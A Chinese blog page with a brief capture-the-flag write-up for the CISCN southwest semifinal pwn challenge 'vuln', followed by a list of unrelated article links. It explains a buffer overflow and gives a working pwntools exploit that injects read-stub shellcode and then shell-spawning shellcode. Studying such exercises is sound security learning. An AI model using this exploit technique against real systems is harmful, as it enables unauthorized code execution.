当前位置: 首页 > news >正文

CISCN--西南半决赛--pwn

news 2025/6/24 21:02:30

1.vuln

这是主函数,数一下就发现可以溢出最后的0x4008d0

 

然后会执行到这里,逻辑就是在v0上写shellcode,不过执行写0x10,不够sh,很明显要先read。

以下是exp:

from pwn import *
context.arch='amd64'
io=process('./vuln')
io.recvuntil(b"input name:\n")
io.sendline(b'a'*39)
#gdb.attach(io)
#pause()
io.recv()
shell='xor rdi,rdi;lea rsi,[rdx+0x9];syscall;'
print(len(asm(shell)))
io.sendline(asm(shell))
#gdb.attach(io)
#pause()
io.sendline(asm(shellcraft.sh()))
io.interactive()

http://www.lryc.cn/news/386413.html

相关文章:

  • DIYGW UniApp低代码可视化平台:高效、灵活、安全的应用开发新途径
  • Python爬虫技术及其原理探秘
  • 堆和栈的区别及应用场景
  • vant的dialog触发了其他overlay
  • Linux驱动开发笔记(十二)并发与竞争
  • 【Mac】Listen 1 for Mac(最强的音乐搜索工具)软件介绍
  • nginx 1024 worker_connections are not enough while connecting to upstream
  • 在Ubuntu 16.04上安装和配置Elasticsearch的方法
  • C#给SqlSugar封装一个单例类
  • Postman接口测试工具的原理及应用详解(六)
  • 【算法 之插入排序 原理及案例】
  • 第一节:如何开发第一个spring boot3.x项目(自学Spring boot 3.x的第一天)
  • JS逆向:由 words 、sigBytes 引发的一系列思考与实践
  • 计算机的错误计算(十五)
  • 制作img文件
  • GB28181视频汇聚平台EasyCVR接入Ehome设备视频播放出现异常是什么原因?
  • Java利用poi实现word,excel,ppt,pdf等各类型文档密码检测
  • 顺序表与链表学习笔记
  • 2.SQL注入-字符型
  • 在Ubuntu 14.04上安装和配置Elasticsearch的方法
  • C++:inline关键字nullptr
  • 数字信号处理实验三(IIR数字滤波器设计)
  • Why is Kafka fast?(Kafka性能基石)
  • Linux下的SSH详解及Ubuntu教程
  • MobPush HarmonyOS NEXT 版本集成指南
  • 什么是封装?为什么要封装?
  • 远程桌面无法复制粘贴文件到本地怎么办?
  • LeetCode 207. 课程表
  • 数据结构历年考研真题对应知识点(树的基本概念)
  • Pytorch和Tensorflow安装【Win和Linux】